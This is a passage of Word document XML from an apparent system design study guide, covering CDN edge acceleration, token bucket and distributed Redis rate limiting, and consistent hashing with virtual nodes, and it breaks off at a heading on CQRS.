      </w:r>
    </w:p>
    <w:p w14:paraId="65F720A4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>CDNs originated for static content (images, JS, CSS). Modern CDNs also accelerate </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dynamic content</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC2EC2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol optimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Even for non-cacheable responses, routing traffic through CDN's private backbone (low-latency, high-bandwidth fiber between PoPs) rather than public internet reduces latency. Cloudflare's Argo Smart Routing, Fastly's network — these private backbones can be 30–50% faster than public internet routing for cross-continental requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8AB9FE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Connection termination at edge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The CDN terminates the user's TLS connection at the nearest edge PoP (eliminating the TLS handshake RTT to a distant origin). The edge maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>persistent, pre-established TLS connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> to the origin. This eliminates the 1–3 RTT TLS handshake for every user connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E263C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Edge computing (Cloudflare Workers, Fastly Compute@Edge, Lambda@Edge):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Execute custom code at CDN edge nodes. Instead of routing uncacheable requests to origin, compute the response </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>at the edge</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — close to the user, with near-zero cold start latency. Used for: A/B testing (modify responses at edge), authentication/authorization (validate JWTs at edge, reject invalid requests before they hit origin), personalization (insert user-specific content into otherwise cacheable pages), bot detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD8112" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="31E7A150">
          <v:rect id="_x0000_i2431" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAD6EFF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Rate Limiting — Internal Token Bucket and Sliding Window Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A881637" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token Bucket — Full Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8ECD5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The token bucket is the most widely used rate limiting algorithm because it correctly handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>burst traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> while enforcing average rate limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443291B4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State per client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630C76A3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>tokens: Current token count (float, not integer — allows fractional tokens for precision).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703039A8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>last_refill_timestamp: Unix timestamp of last refill computation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0520D832" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>capacity: Maximum tokens (defines burst size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5812BADF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>refill_rate: Tokens added per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197EC81" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On each request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58F57F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Compute time elapsed since last_refill_timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEBA71" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Add elapsed × refill_rate tokens to tokens, cap at capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D34875" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Update last_refill_timestamp to now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F8E51" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If tokens &gt;= 1: subtract 1 token, allow the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56537CC9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If tokens &lt; 1: reject the request (or delay until a token is available).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7102C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No background thread needed</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — the refill is computed lazily at request time. This is elegant and efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A644A11" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Burst behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> If no requests arrive for 10 seconds and refill_rate = 100/second, capacity = 500, then after 10 seconds of idle time, the bucket refills to min(500, 0 + 10×100) = 500 tokens. The next 500 requests are served instantly (the burst). After the burst, the rate drops to 100/second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A3F1A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>This burst tolerance is a feature — it handles natural traffic spikes (user sends a burst of API calls) without penalizing them, as long as the burst doesn't exceed the bucket capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D38283" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed Rate Limiting — The Coordination Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D42D307" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>With 100 application servers each maintaining local token buckets, a client can send N requests to each server, effectively bypassing a limit of N by distributing across servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A67B8C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Centralized Redis rate limiter:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> All rate limit state lives in Redis. Each request, regardless of which app server receives it, atomically updates the shared token bucket in Redis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE990E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The atomicity requirement is critical — if two app servers simultaneously check and decrement the token count, they might both see tokens=1, both allow their requests, and the count goes to -1 (over the limit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA276D8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Redis Lua scripts execute </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atomically</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — no other command runs between the Lua script's read and write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5FE41" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The Lua script reads current token state, computes refill, checks if request should be allowed, updates state — all as one atomic operation. This eliminates race conditions without distributed locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7EFE3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The trade-off:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Every request that requires rate limiting needs one Redis round-trip (~0.5–2ms). For high-traffic systems, this is significant overhead. Optimizations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEA9D00" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local token bucket + periodic sync:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each app server maintains a local bucket. Periodically (every 100ms), sync with Redis — fetch the global count and reconcile. Brief inaccuracies (could slightly exceed the limit) in exchange for dramatically reduced Redis load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95D20E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token bucket with allowance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each app server pre-claims a batch of tokens from Redis (e.g., 100 tokens per sync). Serves requests from its local batch. More Redis-efficient, slightly imprecise for strict limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA840BF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="1E2437F5">
          <v:rect id="_x0000_i2432" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8BB2D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Consistent Hashing — The Full Picture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C17462" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Problem With Modulo Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169A8E93" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Standard server = hash(key) % N is catastrophic when N changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C4F01" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>N=4 → N=5 (add one server): nearly all keys remap. hash("user:123") % 4 = 3, hash("user:123") % 5 = 2. The key moves from server 3 to server 2. Almost every cached item is invalidated. The database receives a thundering herd of requests as the cache completely misses on everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4FBCA4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent Hashing Ring — Full Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1004D345" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Map both </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> to the same hash space [0, 2³²) arranged as a ring (0 and 2³² are the same point).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2429C2ED" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server placement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Hash each server's identifier (e.g., hash("server1"), hash("server2")) to get its position on the ring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7127D529" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key assignment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Hash the data key to a position. Scan </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clockwise</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> from that position. The first server encountered is the key's owner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202988A6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adding a server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BFA6E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Hash the new server to a position P on the ring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D733BA7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Only keys that were previously assigned to the clockwise neighbor of P (keys between P's predecessor and P) now move to the new server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C472DF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>All other keys are unaffected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377C2EF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>On average, only </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1/N</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> of keys move (where N is the new node count).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447E1048" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Removing a server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343829B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Keys assigned to the removed server move to the next clockwise server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF65617" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Only that server's keys are affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68518BC4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The virtual node (vnode) solution to uneven distribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BCF1F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>With few physical servers, the ring may have uneven coverage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F5A7D7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server A: responsible for 40% of keyspace (if there's a large gap before it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183492D6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server B: responsible for 15% of keyspace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F1EA45" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server C: responsible for 45% of keyspace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B51A54" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server C handles 3x more keys than server B — a hotspot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BFEA5F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Solution: Each physical server is hashed to </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiple positions</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> on the ring (virtual nodes). Instead of hash("server1") → one position, you hash hash("server1-vnode-1"), hash("server1-vnode-2"), ..., hash("server1-vnode-150") → 150 positions. Each physical server is responsible for 150 small arcs of the ring rather than one large arc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F20E4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>With 150 vnodes per server, the law of large numbers ensures approximately equal distribution — each server handles ~1/N of the keyspace. When a server is added, it claims 150 small slices from various other servers (from many servers, not all from one) — minimal disruption, excellent distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEDB79F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cassandra's token ring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Cassandra uses consistent hashing with vnodes. Each node is assigned 256 virtual nodes by default. Data is replicated to the next N distinct physical nodes clockwise (not vnodes — distinct physical nodes to ensure replicas are on different machines). This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>replication strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — RF=3 means the 3 next distinct physical nodes own replicas of every key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA4513" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="6E8366D3">
          <v:rect id="_x0000_i2433" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F28BC8D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. CQRS and Event Sourcing — Scaling Read and Write Paths Independently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D62E1D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
